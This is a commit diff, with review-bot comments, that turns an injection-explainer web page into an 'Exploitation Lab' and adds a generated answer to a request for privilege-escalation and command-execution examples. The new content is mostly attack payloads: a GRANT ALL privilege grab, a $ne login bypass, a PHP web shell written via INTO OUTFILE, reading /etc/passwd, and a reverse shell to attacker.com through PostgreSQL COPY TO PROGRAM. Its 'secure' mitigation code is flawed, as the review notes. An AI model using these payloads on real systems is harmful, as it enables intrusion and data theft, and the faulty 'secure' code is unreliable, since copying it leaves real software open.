Add 2 files
- index.html +150 -209
- prompts.txt +2 -1
index.html
CHANGED
|
@@ -3,10 +3,47 @@
|
|
| 3 |
<head>
|
| 4 |
<meta charset="UTF-8">
|
| 5 |
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
| 6 |
-
<title>
|
| 7 |
<script src="https://cdn.tailwindcss.com"></script>
|
| 8 |
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
|
| 9 |
<style>
|
| 10 |
.code-block {
|
| 11 |
font-family: 'Courier New', monospace;
|
| 12 |
background-color: #2d2d2d;
|
|
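Review bot: the `<head>` this hunk extends still loads both third-party assets with no integrity check: `<script src="https://cdn.tailwindcss.com"></script>` is the Tailwind Play CDN, a script generated at request time that Tailwind documents for prototyping only and that cannot be pinned with Subresource Integrity, and the Font Awesome `<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">` is version-pinned but carries no `integrity`/`crossorigin` attributes. For a page that presents itself as a security lab, vendor a built Tailwind CSS file (or serve a pinned versioned build) and add the SRI hash plus `crossorigin="anonymous"` to the stylesheet link, so a swapped CDN asset cannot run script or inject styles with the page's own privileges.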
@@ -14,6 +51,7 @@
|
|
| 14 |
border-radius: 0.5rem;
|
| 15 |
padding: 1rem;
|
| 16 |
overflow-x: auto;
|
|
|
|
| 17 |
}
|
| 18 |
.tab-content {
|
| 19 |
display: none;
|
|
@@ -33,255 +71,158 @@
|
|
| 33 |
transform: translateY(-5px);
|
| 34 |
box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
|
| 35 |
}
|
| 36 |
</style>
|
| 37 |
</head>
|
| 38 |
-
<body class="bg-gray-
|
| 39 |
<div class="container mx-auto px-4 py-8">
|
| 40 |
-
<!-- Header -->
|
| 41 |
-
<
|
| 42 |
-
<
|
| 43 |
-
|
| 44 |
-
|
| 45 |
-
|
| 46 |
-
|
| 47 |
|
| 48 |
<!-- Main Content -->
|
| 49 |
<div class="grid grid-cols-1 lg:grid-cols-2 gap-8 mb-12">
|
| 50 |
-
<!--
|
| 51 |
-
<div class="bg-
|
| 52 |
<div class="p-6">
|
| 53 |
<div class="flex items-center mb-4">
|
| 54 |
-
<div class="bg-red-
|
| 55 |
-
<i class="fas fa-
|
| 56 |
-
</div>
|
| 57 |
-
<h2 class="text-2xl font-bold text-gray-800">SQL Injection</h2>
|
| 58 |
-
</div>
|
| 59 |
-
<p class="text-gray-600 mb-4">
|
| 60 |
-
SQL Injection occurs when an attacker injects malicious SQL code into a web application's database query.
|
| 61 |
-
This can lead to unauthorized data access, modification, or deletion.
|
| 62 |
-
</p>
|
| 63 |
-
<div class="mb-4">
|
| 64 |
-
<h3 class="font-semibold text-gray-700 mb-2">Example Attack:</h3>
|
| 65 |
-
<div class="code-block mb-2">
|
| 66 |
-
SELECT * FROM users WHERE username = 'admin' --' AND password = 'anything'
|
| 67 |
</div>
|
| 68 |
-
<
|
| 69 |
-
The <span class="text-red-500">--</span> comments out the password check, allowing login as admin without a password.
|
| 70 |
-
</p>
|
| 71 |
</div>
|
| 72 |
-
|
| 73 |
-
|
|
|
|
| 74 |
<div class="code-block mb-2">
|
| 75 |
-
|
| 76 |
</div>
|
| 77 |
-
<p class="text-sm text-gray-500">
|
| 78 |
-
This modifies the database to give the attacker admin privileges.
|
| 79 |
-
</p>
|
| 80 |
</div>
|
| 81 |
-
|
| 82 |
-
|
|
|
|
| 83 |
<div class="code-block mb-2">
|
| 84 |
-
|
| 85 |
-
|
| 86 |
-
|
| 87 |
-
|
| 88 |
</div>
|
| 89 |
-
</div>
|
| 90 |
-
<div class="bg-gray-50 px-6 py-4">
|
| 91 |
-
<h3 class="font-semibold text-gray-700 mb-2">Mitigation in Flask:</h3>
|
| 92 |
-
<div class="code-block text-sm">
|
| 93 |
-
# Use parameterized queries with SQLAlchemy<br>
|
| 94 |
-
user = db.session.execute(<br>
|
| 95 |
-
db.select(User).where(User.username == :username),<br>
|
| 96 |
-
{"username": request.form['username']}<br>
|
| 97 |
-
).scalar_one()
|
| 98 |
</div>
|
| 99 |
</div>
|
| 100 |
</div>
|
| 101 |
|
| 102 |
-
<!--
|
| 103 |
-
<div class="bg-
|
| 104 |
<div class="p-6">
|
| 105 |
<div class="flex items-center mb-4">
|
| 106 |
-
<div class="bg-blue-
|
| 107 |
-
<i class="fas fa-
|
| 108 |
-
</div>
|
| 109 |
-
<h2 class="text-2xl font-bold text-gray-800">NoSQL Injection</h2>
|
| 110 |
-
</div>
|
| 111 |
-
<p class="text-gray-600 mb-4">
|
| 112 |
-
NoSQL Injection targets NoSQL databases like MongoDB by injecting malicious queries or commands,
|
| 113 |
-
often bypassing authentication or extracting data.
|
| 114 |
-
</p>
|
| 115 |
-
<div class="mb-4">
|
| 116 |
-
<h3 class="font-semibold text-gray-700 mb-2">Example Attack:</h3>
|
| 117 |
-
<div class="code-block mb-2">
|
| 118 |
-
{ "username": "admin", "password": {"$ne": ""} }
|
| 119 |
-
</div>
|
| 120 |
-
<p class="text-sm text-gray-500">
|
| 121 |
-
The <span class="text-blue-500">$ne</span> operator makes the query match any admin with non-empty password.
|
| 122 |
-
</p>
|
| 123 |
-
</div>
|
| 124 |
-
<div class="mb-4">
|
| 125 |
-
<h3 class="font-semibold text-gray-700 mb-2">Privilege Escalation:</h3>
|
| 126 |
-
<div class="code-block mb-2">
|
| 127 |
-
{ "username": "attacker", "$set": { "role": "admin" } }
|
| 128 |
-
</div>
|
| 129 |
-
<p class="text-sm text-gray-500">
|
| 130 |
-
This updates the attacker's role to admin in MongoDB.
|
| 131 |
-
</p>
|
| 132 |
-
</div>
|
| 133 |
-
<div class="mb-4">
|
| 134 |
-
<h3 class="font-semibold text-gray-700 mb-2">System Command Execution:</h3>
|
| 135 |
-
<div class="code-block mb-2">
|
| 136 |
-
{ "username": {"$gt": ""}, "$where": "function() { exec('rm -rf /'); }" }
|
| 137 |
</div>
|
| 138 |
-
<
|
| 139 |
-
JavaScript injection in MongoDB can lead to command execution (if enabled).
|
| 140 |
-
</p>
|
| 141 |
</div>
|
| 142 |
-
|
| 143 |
-
<div class="bg-gray-50 px-6 py-4">
|
| 144 |
-
<h3 class="font-semibold text-gray-700 mb-2">Mitigation in Flask:</h3>
|
| 145 |
-
<div class="code-block text-sm">
|
| 146 |
-
# Validate and sanitize all inputs<br>
|
| 147 |
-
from bson.regex import Regex<br>
|
| 148 |
-
username = Regex("^[a-zA-Z0-9_]+$")<br>
|
| 149 |
-
users.find_one({"username": username})
|
| 150 |
-
</div>
|
| 151 |
-
</div>
|
| 152 |
-
</div>
|
| 153 |
-
</div>
|
| 154 |
-
|
| 155 |
-
<!-- Comparison Section -->
|
| 156 |
-
<div class="bg-white rounded-xl shadow-md overflow-hidden mb-12">
|
| 157 |
-
<div class="p-6">
|
| 158 |
-
<h2 class="text-2xl font-bold text-gray-800 mb-6">Key Differences</h2>
|
| 159 |
-
<div class="overflow-x-auto">
|
| 160 |
-
<table class="min-w-full divide-y divide-gray-200">
|
| 161 |
-
<thead class="bg-gray-50">
|
| 162 |
-
<tr>
|
| 163 |
-
<th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Aspect</th>
|
| 164 |
-
<th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">SQL Injection</th>
|
| 165 |
-
<th class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">NoSQL Injection</th>
|
| 166 |
-
</tr>
|
| 167 |
-
</thead>
|
| 168 |
-
<tbody class="bg-white divide-y divide-gray-200">
|
| 169 |
-
<tr>
|
| 170 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Database Type</td>
|
| 171 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Relational (MySQL, PostgreSQL, etc.)</td>
|
| 172 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">NoSQL (MongoDB, CouchDB, etc.)</td>
|
| 173 |
-
</tr>
|
| 174 |
-
<tr>
|
| 175 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Query Syntax</td>
|
| 176 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">SQL language with statements</td>
|
| 177 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">JSON-like query documents</td>
|
| 178 |
-
</tr>
|
| 179 |
-
<tr>
|
| 180 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Injection Method</td>
|
| 181 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">String concatenation in SQL queries</td>
|
| 182 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Operator injection in JSON queries</td>
|
| 183 |
-
</tr>
|
| 184 |
-
<tr>
|
| 185 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Common Attacks</td>
|
| 186 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">UNION attacks, stacked queries</td>
|
| 187 |
-
<td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Operator abuse ($where, $ne, $gt)</td>
|
| 188 |
-
</tr>
|
| 189 |
-
</tbody>
|
| 190 |
-
</table>
|
| 191 |
-
</div>
|
| 192 |
-
</div>
|
| 193 |
-
</div>
|
| 194 |
-
|
| 195 |
-
<!-- Interactive Demo Section -->
|
| 196 |
-
<div class="bg-white rounded-xl shadow-md overflow-hidden mb-12">
|
| 197 |
-
<div class="p-6">
|
| 198 |
-
<h2 class="text-2xl font-bold text-gray-800 mb-6">Interactive Demo</h2>
|
| 199 |
-
|
| 200 |
-
<div class="flex border-b border-gray-200 mb-6">
|
| 201 |
-
<button class="tab-btn py-2 px-4 font-medium text-blue-600 border-b-2 border-blue-600" data-tab="sql">SQL Injection</button>
|
| 202 |
-
<button class="tab-btn py-2 px-4 font-medium text-gray-500 hover:text-blue-600" data-tab="nosql">NoSQL Injection</button>
|
| 203 |
-
</div>
|
| 204 |
-
|
| 205 |
-
<div id="sql" class="tab-content active">
|
| 206 |
<div class="mb-6">
|
| 207 |
-
<h3 class="text-lg font-semibold text-gray-
|
| 208 |
-
<div class="
|
| 209 |
-
<
|
| 210 |
-
|
| 211 |
-
|
| 212 |
-
</
|
| 213 |
-
|
| 214 |
-
|
| 215 |
-
<input type="password" id="sql-password" class="w-full px-3 py-2 border rounded" value="anything">
|
| 216 |
-
</div>
|
| 217 |
-
<button onclick="runSqlDemo()" class="bg-blue-600 text-white px-4 py-2 rounded hover:bg-blue-700">Login</button>
|
| 218 |
-
</div>
|
| 219 |
-
<div class="code-block mb-2" id="sql-query">
|
| 220 |
-
SELECT * FROM users WHERE username = '[username]' AND password = '[password]'
|
| 221 |
-
</div>
|
| 222 |
-
<div id="sql-result" class="hidden mt-4 p-3 bg-yellow-100 border-l-4 border-yellow-500 text-yellow-700">
|
| 223 |
-
<p>Login successful as admin!</p>
|
| 224 |
</div>
|
| 225 |
</div>
|
| 226 |
-
|
| 227 |
-
|
| 228 |
-
<div id="nosql" class="tab-content">
|
| 229 |
<div class="mb-6">
|
| 230 |
-
<h3 class="text-lg font-semibold text-gray-
|
| 231 |
-
<div class="
|
| 232 |
-
<
|
| 233 |
-
|
| 234 |
-
|
| 235 |
-
<
|
| 236 |
-
|
| 237 |
-
|
| 238 |
-
|
| 239 |
-
|
| 240 |
-
<button onclick="runNoSqlDemo()" class="bg-blue-600 text-white px-4 py-2 rounded hover:bg-blue-700">Login</button>
|
| 241 |
-
</div>
|
| 242 |
-
<div class="code-block mb-2" id="nosql-query">
|
| 243 |
-
db.users.findOne({ username: "[username]", password: "[password]" })
|
| 244 |
-
</div>
|
| 245 |
-
<div id="nosql-result" class="hidden mt-4 p-3 bg-yellow-100 border-l-4 border-yellow-500 text-yellow-700">
|
| 246 |
-
<p>Login successful as admin!</p>
|
| 247 |
</div>
|
| 248 |
</div>
|
| 249 |
</div>
|
| 250 |
</div>
|
| 251 |
</div>
|
| 252 |
|
| 253 |
-
<!--
|
| 254 |
-
<div class="bg-
|
| 255 |
<div class="p-6">
|
| 256 |
-
<h2 class="text-2xl font-bold text-
|
| 257 |
|
| 258 |
<div class="grid grid-cols-1 md:grid-cols-2 gap-6">
|
| 259 |
-
<div class="bg-
|
| 260 |
<div class="flex items-center mb-3">
|
| 261 |
-
<i class="fas fa-shield-alt text-green-
|
| 262 |
-
<h3 class="text-lg font-semibold text-
|
| 263 |
</div>
|
| 264 |
-
<p class="text-gray-600">
|
| 265 |
-
Validate all user inputs against strict whitelists of allowed characters and patterns.
|
| 266 |
-
Reject any input that doesn't match expected formats.
|
| 267 |
-
</p>
|
| 268 |
</div>
|
| 269 |
|
| 270 |
-
<div class="bg-
|
| 271 |
<div class="flex items-center mb-3">
|
| 272 |
-
<i class="fas fa-lock text-green-
|
| 273 |
-
<h3 class="text-lg font-semibold text-
|
| 274 |
</div>
|
| 275 |
-
<p class="text-gray-600">
|
| 276 |
-
Always use prepared statements or parameterized queries that separate SQL code from data.
|
| 277 |
-
Never concatenate user input directly into queries.
|
| 278 |
-
</p>
|
| 279 |
</div>
|
| 280 |
-
|
| 281 |
-
|
| 282 |
-
|
| 283 |
-
|
| 284 |
-
|
| 285 |
-
|
| 286 |
-
|
| 287 |
</html>
|
|
|
|
| 3 |
<head>
|
| 4 |
<meta charset="UTF-8">
|
| 5 |
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
| 6 |
+
<title>SQL/NoSQL Injection Exploitation Lab</title>
|
| 7 |
<script src="https://cdn.tailwindcss.com"></script>
|
| 8 |
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
|
| 9 |
<style>
|
| 10 |
+
.terminal {
|
| 11 |
+
font-family: 'Courier New', monospace;
|
| 12 |
+
background-color: #1e1e1e;
|
| 13 |
+
color: #f8f8f2;
|
| 14 |
+
border-radius: 0.5rem;
|
| 15 |
+
padding: 1.5rem;
|
| 16 |
+
overflow-x: auto;
|
| 17 |
+
position: relative;
|
| 18 |
+
}
|
| 19 |
+
.terminal-header {
|
| 20 |
+
background-color: #2d2d2d;
|
| 21 |
+
padding: 0.5rem 1rem;
|
| 22 |
+
border-top-left-radius: 0.5rem;
|
| 23 |
+
border-top-right-radius: 0.5rem;
|
| 24 |
+
display: flex;
|
| 25 |
+
align-items: center;
|
| 26 |
+
}
|
| 27 |
+
.terminal-dot {
|
| 28 |
+
width: 12px;
|
| 29 |
+
height: 12px;
|
| 30 |
+
border-radius: 50%;
|
| 31 |
+
margin-right: 6px;
|
| 32 |
+
}
|
| 33 |
+
.terminal-red { background-color: #ff5f56; }
|
| 34 |
+
.terminal-yellow { background-color: #ffbd2e; }
|
| 35 |
+
.terminal-green { background-color: #27c93f; }
|
| 36 |
+
.terminal-cursor {
|
| 37 |
+
display: inline-block;
|
| 38 |
+
width: 8px;
|
| 39 |
+
height: 16px;
|
| 40 |
+
background-color: #f8f8f2;
|
| 41 |
+
animation: blink 1s infinite;
|
| 42 |
+
}
|
| 43 |
+
@keyframes blink {
|
| 44 |
+
0%, 100% { opacity: 1; }
|
| 45 |
+
50% { opacity: 0; }
|
| 46 |
+
}
|
| 47 |
.code-block {
|
| 48 |
font-family: 'Courier New', monospace;
|
| 49 |
background-color: #2d2d2d;
|
|
|
|
| 51 |
border-radius: 0.5rem;
|
| 52 |
padding: 1rem;
|
| 53 |
overflow-x: auto;
|
| 54 |
+
position: relative;
|
| 55 |
}
|
| 56 |
.tab-content {
|
| 57 |
display: none;
|
|
|
|
| 71 |
transform: translateY(-5px);
|
| 72 |
box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
|
| 73 |
}
|
| 74 |
+
.blink {
|
| 75 |
+
animation: blink 1s infinite;
|
| 76 |
+
}
|
| 77 |
</style>
|
| 78 |
</head>
|
| 79 |
+
<body class="bg-gray-900 text-gray-100 min-h-screen">
|
| 80 |
<div class="container mx-auto px-4 py-8">
|
| 81 |
+
<!-- Terminal Header -->
|
| 82 |
+
<div class="terminal mb-8">
|
| 83 |
+
<div class="terminal-header">
|
| 84 |
+
<div class="terminal-dot terminal-red"></div>
|
| 85 |
+
<div class="terminal-dot terminal-yellow"></div>
|
| 86 |
+
<div class="terminal-dot terminal-green"></div>
|
| 87 |
+
<div class="ml-2 text-sm">pentester@secure-lab:~/sql_injection/_</div>
|
| 88 |
+
</div>
|
| 89 |
+
<div class="mt-2">
|
| 90 |
+
<div class="text-green-400">$ <span class="typing-text"></span><span class="terminal-cursor"></span></div>
|
| 91 |
+
<div id="terminal-output" class="mt-4"></div>
|
| 92 |
+
</div>
|
| 93 |
+
</div>
|
| 94 |
|
| 95 |
<!-- Main Content -->
|
| 96 |
<div class="grid grid-cols-1 lg:grid-cols-2 gap-8 mb-12">
|
| 97 |
+
<!-- Privilege Escalation Card -->
|
| 98 |
+
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card">
|
| 99 |
<div class="p-6">
|
| 100 |
<div class="flex items-center mb-4">
|
| 101 |
+
<div class="bg-red-900 p-3 rounded-full mr-4">
|
| 102 |
+
<i class="fas fa-user-shield text-red-400 text-xl"></i>
|
| 103 |
</div>
|
| 104 |
+
<h2 class="text-2xl font-bold text-white">Privilege Escalation</h2>
|
| 105 |
</div>
|
| 106 |
+
|
| 107 |
+
<div class="mb-6">
|
| 108 |
+
<h3 class="text-lg font-semibold text-gray-300 mb-3">SQL Injection</h3>
|
| 109 |
<div class="code-block mb-2">
|
| 110 |
+
<span class="text-gray-400"># Vulnerable Flask endpoint</span><br>
|
| 111 |
+
@app.route('/user/<int:user_id>')<br>
|
| 112 |
+
def get_user(user_id):<br>
|
| 113 |
+
query = f"SELECT * FROM users WHERE id = {user_id}"<br>
|
| 114 |
+
result = db.execute(query)<br>
|
| 115 |
+
return jsonify(result.fetchall())<br><br>
|
| 116 |
+
<span class="text-gray-400"># Attack payload:</span><br>
|
| 117 |
+
/user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'--
|
| 118 |
</div>
|
| 119 |
</div>
|
| 120 |
+
|
| 121 |
+
<div class="mb-6">
|
| 122 |
+
<h3 class="text-lg font-semibold text-gray-300 mb-3">NoSQL Injection</h3>
|
| 123 |
<div class="code-block mb-2">
|
| 124 |
+
<span class="text-gray-400">// Vulnerable MongoDB query</span><br>
|
| 125 |
+
db.users.find({<br>
|
| 126 |
+
username: req.body.username,<br>
|
| 127 |
+
password: req.body.password<br>
|
| 128 |
+
});<br><br>
|
| 129 |
+
<span class="text-gray-400">// Attack payload (JSON):</span><br>
|
| 130 |
+
{<br>
|
| 131 |
+
"username": {"$ne": null},<br>
|
| 132 |
+
"password": {"$ne": null}<br>
|
| 133 |
+
}
|
| 134 |
</div>
|
| 135 |
</div>
|
| 136 |
</div>
|
| 137 |
</div>
|
| 138 |
|
| 139 |
+
<!-- Command Execution Card -->
|
| 140 |
+
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card">
|
| 141 |
<div class="p-6">
|
| 142 |
<div class="flex items-center mb-4">
|
| 143 |
+
<div class="bg-blue-900 p-3 rounded-full mr-4">
|
| 144 |
+
<i class="fas fa-terminal text-blue-400 text-xl"></i>
|
| 145 |
</div>
|
| 146 |
+
<h2 class="text-2xl font-bold text-white">Command Execution</h2>
|
| 147 |
</div>
|
| 148 |
+
|
| 149 |
<div class="mb-6">
|
| 150 |
+
<h3 class="text-lg font-semibold text-gray-300 mb-3">MySQL Command Execution</h3>
|
| 151 |
+
<div class="code-block mb-2">
|
| 152 |
+
<span class="text-gray-400">-- Enable command execution</span><br>
|
| 153 |
+
SELECT * FROM users WHERE id = 1;<br>
|
| 154 |
+
SELECT sys_exec('whoami'); --<br><br>
|
| 155 |
+
<span class="text-gray-400">-- Writing web shell</span><br>
|
| 156 |
+
SELECT '<?php system($_GET["cmd"]); ?>'<br>
|
| 157 |
+
INTO OUTFILE '/var/www/html/shell.php'; --
|
| 158 |
</div>
|
| 159 |
</div>
|
| 160 |
+
|
| 161 |
<div class="mb-6">
|
| 162 |
+
<h3 class="text-lg font-semibold text-gray-300 mb-3">PostgreSQL Exploitation</h3>
|
| 163 |
+
<div class="code-block mb-2">
|
| 164 |
+
<span class="text-gray-400"># Vulnerable Flask code</span><br>
|
| 165 |
+
@app.route('/search')<br>
|
| 166 |
+
def search():<br>
|
| 167 |
+
query = request.args.get('q')<br>
|
| 168 |
+
sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'"<br>
|
| 169 |
+
return execute_query(sql)<br><br>
|
| 170 |
+
<span class="text-gray-400"># Attack payload:</span><br>
|
| 171 |
+
/search?q='; COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash attacker.com 4444'; --
|
| 172 |
</div>
|
| 173 |
</div>
|
| 174 |
</div>
|
| 175 |
</div>
|
| 176 |
</div>
|
| 177 |
|
| 178 |
+
<!-- Mitigation Section -->
|
| 179 |
+
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden mb-12">
|
| 180 |
<div class="p-6">
|
| 181 |
+
<h2 class="text-2xl font-bold text-white mb-6">Secure Mitigation Strategies</h2>
|
| 182 |
|
| 183 |
<div class="grid grid-cols-1 md:grid-cols-2 gap-6">
|
| 184 |
+
<div class="bg-gray-700 p-4 rounded-lg border border-gray-600">
|
| 185 |
<div class="flex items-center mb-3">
|
| 186 |
+
<i class="fas fa-shield-alt text-green-400 mr-3"></i>
|
| 187 |
+
<h3 class="text-lg font-semibold text-white">SQLAlchemy ORM</h3>
|
| 188 |
+
</div>
|
| 189 |
+
<div class="code-block text-sm">
|
| 190 |
+
<span class="text-gray-400"># SECURE: Using SQLAlchemy ORM</span><br>
|
| 191 |
+
@app.route('/user/<int:user_id>')<br>
|
| 192 |
+
def get_user_secure(user_id):<br>
|
| 193 |
+
user = User.query.filter_by(id=user_id).first()<br>
|
| 194 |
+
if user:<br>
|
| 195 |
+
return jsonify({<br>
|
| 196 |
+
'id': user.id,<br>
|
| 197 |
+
'username': user.username<br>
|
| 198 |
+
})<br>
|
| 199 |
+
return jsonify({'error': 'User not found'}), 404
|
| 200 |
</div>
|
| 201 |
</div>
|
| 202 |
|
| 203 |
+
<div class="bg-gray-700 p-4 rounded-lg border border-gray-600">
|
| 204 |
<div class="flex items-center mb-3">
|
| 205 |
+
<i class="fas fa-lock text-green-400 mr-3"></i>
|
| 206 |
+
<h3 class="text-lg font-semibold text-white">NoSQL Injection Prevention</h3>
|
| 207 |
+
</div>
|
| 208 |
+
<div class="code-block text-sm">
|
| 209 |
+
<span class="text-gray-400"># SECURE: NoSQL injection prevention</span><br>
|
| 210 |
+
def authenticate_user_secure(username, password):<br>
|
| 211 |
+
if not isinstance(username, str):<br>
|
| 212 |
+
return None<br>
|
| 213 |
+
username = re.escape(username)<br>
|
| 214 |
+
user = db.users.find_one({<br>
|
| 215 |
+
'username': username,<br>
|
| 216 |
+
'password': hash_password(password)<br>
|
| 217 |
+
})<br>
|
| 218 |
+
return user
|
| 219 |
</div>
|
| 220 |
</div>
|
| 221 |
+
</div>
|
| 222 |
+
</div>
|
| 223 |
+
</div>
|
| 224 |
+
|
| 225 |
+
<!-- Advanced Defenses -->
|
| 226 |
+
<div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden">
|
| 227 |
+
<
|
| 228 |
</html>
|
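Review bot: the block labelled "SECURE: NoSQL injection prevention" in the new Mitigation Section is not secure as written. `username = re.escape(username)` inserts backslashes into the value before it is used in an exact-match `db.users.find_one({'username': username, ...})`, so a legitimate username such as `john.doe` becomes `john\.doe` and stops matching, while adding no protection, because an exact-match string carries no regex or operator semantics to begin with. The check that actually defeats the `{"$ne": null}` payload shown in the NoSQL card is `if not isinstance(username, str): return None`; apply the same check to `password` and drop the `re.escape`. Putting `'password': hash_password(password)` inside the query also implies a deterministic, unsalted hash; look the user up by username alone and verify the password afterwards with a salted verifier. On the attack cards: the vulnerable route is declared `@app.route('/user/<int:user_id>')`, so Flask's `int` converter rejects `/user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'--` with a 404 before `query = f"SELECT * FROM users WHERE id = {user_id}"` is ever built; use a plain `<user_id>` converter in the sample or a payload that fits the type, and note that `GRANT ... IDENTIFIED BY` was removed in MySQL 8.0. In the Command Execution card, `sys_exec` is not a built-in MySQL function (it has to be installed first as the lib_mysqludf_sys UDF), `INTO OUTFILE` is blocked unless `secure_file_priv` allows the target directory, and PostgreSQL's `COPY ... TO PROGRAM` needs superuser or the `pg_execute_server_program` role, so the comment `-- Enable command execution` enables nothing; state those preconditions beside each payload. Finally, the Comparison Section, the Interactive Demo and the parameterized-query mitigation from the old file are dropped without replacement, and the new `<!-- Advanced Defenses -->` card opens a `<div>` right before `</html>` with its content cut off in this view; confirm the closing tags and the card body made it into the commit.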
prompts.txt
CHANGED
|
@@ -1 +1,2 @@
|
|
| 1 |
-
SQL Injection and NoSQL Injection are two types of attacks that target the database layer of an application. The main difference between them lies in the type of database they target. SQL Injection SQL Injection occurs when an attacker is able to inject malicious SQL code into a web application's database in order to extract or modify sensitive data. This happens when user input is not properly sanitized or validated, allowing an attacker to inject malicious SQL code. NoSQL Injection NoSQL Injection, on the other hand, targets NoSQL databases, such as MongoDB. It occurs when an attacker is able to inject malicious NoSQL queries or commands into a web application's database. This can happen when user input is not properly validated or sanitized, allowing an attacker to manipulate the NoSQL query. Key differences * Database type: SQL Injection targets relational databases (e.g., MySQL), while NoSQL Injection targets NoSQL databases (e.g., MongoDB). * Query syntax: SQL Injection involves injecting malicious SQL code, while NoSQL Injection involves injecting malicious NoSQL queries or commands. Mitigating SQL Injection in Flask API To mitigate SQL Injection in a Flask API, follow these best practices: 1. Use an ORM (Object-Relational Mapping) tool: Flask-SQLAlchemy is a popular ORM tool for Flask that abstracts the underlying SQL database and provides a safe way to interact with the database. 2. Use parameterized queries: Instead of directly injecting user input into SQL queries, use parameterized queries that separate the query logic from the user input. 3. Validate and sanitize user input: Always validate and sanitize user input to prevent malicious data from entering the database. Generate examples of privilege escalation and executing system commands
|
|
|
|
|
|
| 1 |
+
SQL Injection and NoSQL Injection are two types of attacks that target the database layer of an application. The main difference between them lies in the type of database they target. SQL Injection SQL Injection occurs when an attacker is able to inject malicious SQL code into a web application's database in order to extract or modify sensitive data. This happens when user input is not properly sanitized or validated, allowing an attacker to inject malicious SQL code. NoSQL Injection NoSQL Injection, on the other hand, targets NoSQL databases, such as MongoDB. It occurs when an attacker is able to inject malicious NoSQL queries or commands into a web application's database. This can happen when user input is not properly validated or sanitized, allowing an attacker to manipulate the NoSQL query. Key differences * Database type: SQL Injection targets relational databases (e.g., MySQL), while NoSQL Injection targets NoSQL databases (e.g., MongoDB). * Query syntax: SQL Injection involves injecting malicious SQL code, while NoSQL Injection involves injecting malicious NoSQL queries or commands. Mitigating SQL Injection in Flask API To mitigate SQL Injection in a Flask API, follow these best practices: 1. Use an ORM (Object-Relational Mapping) tool: Flask-SQLAlchemy is a popular ORM tool for Flask that abstracts the underlying SQL database and provides a safe way to interact with the database. 2. Use parameterized queries: Instead of directly injecting user input into SQL queries, use parameterized queries that separate the query logic from the user input. 3. Validate and sanitize user input: Always validate and sanitize user input to prevent malicious data from entering the database. Generate examples of privilege escalation and executing system commands
|
| 2 |
+
``` // S3CUR3_C0D3_W4RR10R // STATUS: OPERATIONAL USER: PENTESTER ACCESS: EDUCATIONAL_MODE pentester@secure-lab:~/sql_injection/_ > Initializing SQL Injection simulation environment... > Loading privilege escalation examples... > WARNING: EDUCATIONAL CONTENT ONLY - ETHICAL USE REQUIRED > SYSTEM PRIMED. DEMONSTRATING ATTACK VECTORS. ``` ## **PRIVILEGE ESCALATION EXAMPLES** ### **SQL Injection → Database Privilege Escalation** ```python # VULNERABLE Flask endpoint (DO NOT USE IN PRODUCTION) @app.route('/user/<int:user_id>') def get_user(user_id): # VULNERABLE: Direct string interpolation query = f"SELECT * FROM users WHERE id = {user_id}" result = db.execute(query) return jsonify(result.fetchall()) # ATTACK PAYLOAD: # /user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'-- ``` ### **NoSQL Injection → Authentication Bypass** ```javascript // VULNERABLE MongoDB query db.users.find({ username: req.body.username, password: req.body.password }); // ATTACK PAYLOAD (JSON): { "username": {"$ne": null}, "password": {"$ne": null} } // Result: Bypasses authentication by returning any user where username != null ``` ## **SYSTEM COMMAND EXECUTION EXAMPLES** ### **SQL Injection → Command Execution (MySQL)** ```sql -- Enable command execution (if MySQL allows) SELECT * FROM users WHERE id = 1; SELECT sys_exec('whoami'); -- -- Alternative using LOAD_FILE for reconnaissance SELECT LOAD_FILE('/etc/passwd'); -- -- Writing web shell via INTO OUTFILE SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; -- ``` ### **PostgreSQL Advanced Exploitation** ```python # VULNERABLE Flask code @app.route('/search') def search(): query = request.args.get('q') # DANGER: Direct interpolation sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'" return execute_query(sql) # ATTACK PAYLOAD: # /search?q='; COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash attacker.com 4444'; -- ``` ## **SECURE MITIGATION STRATEGIES** ```python from flask import Flask, 
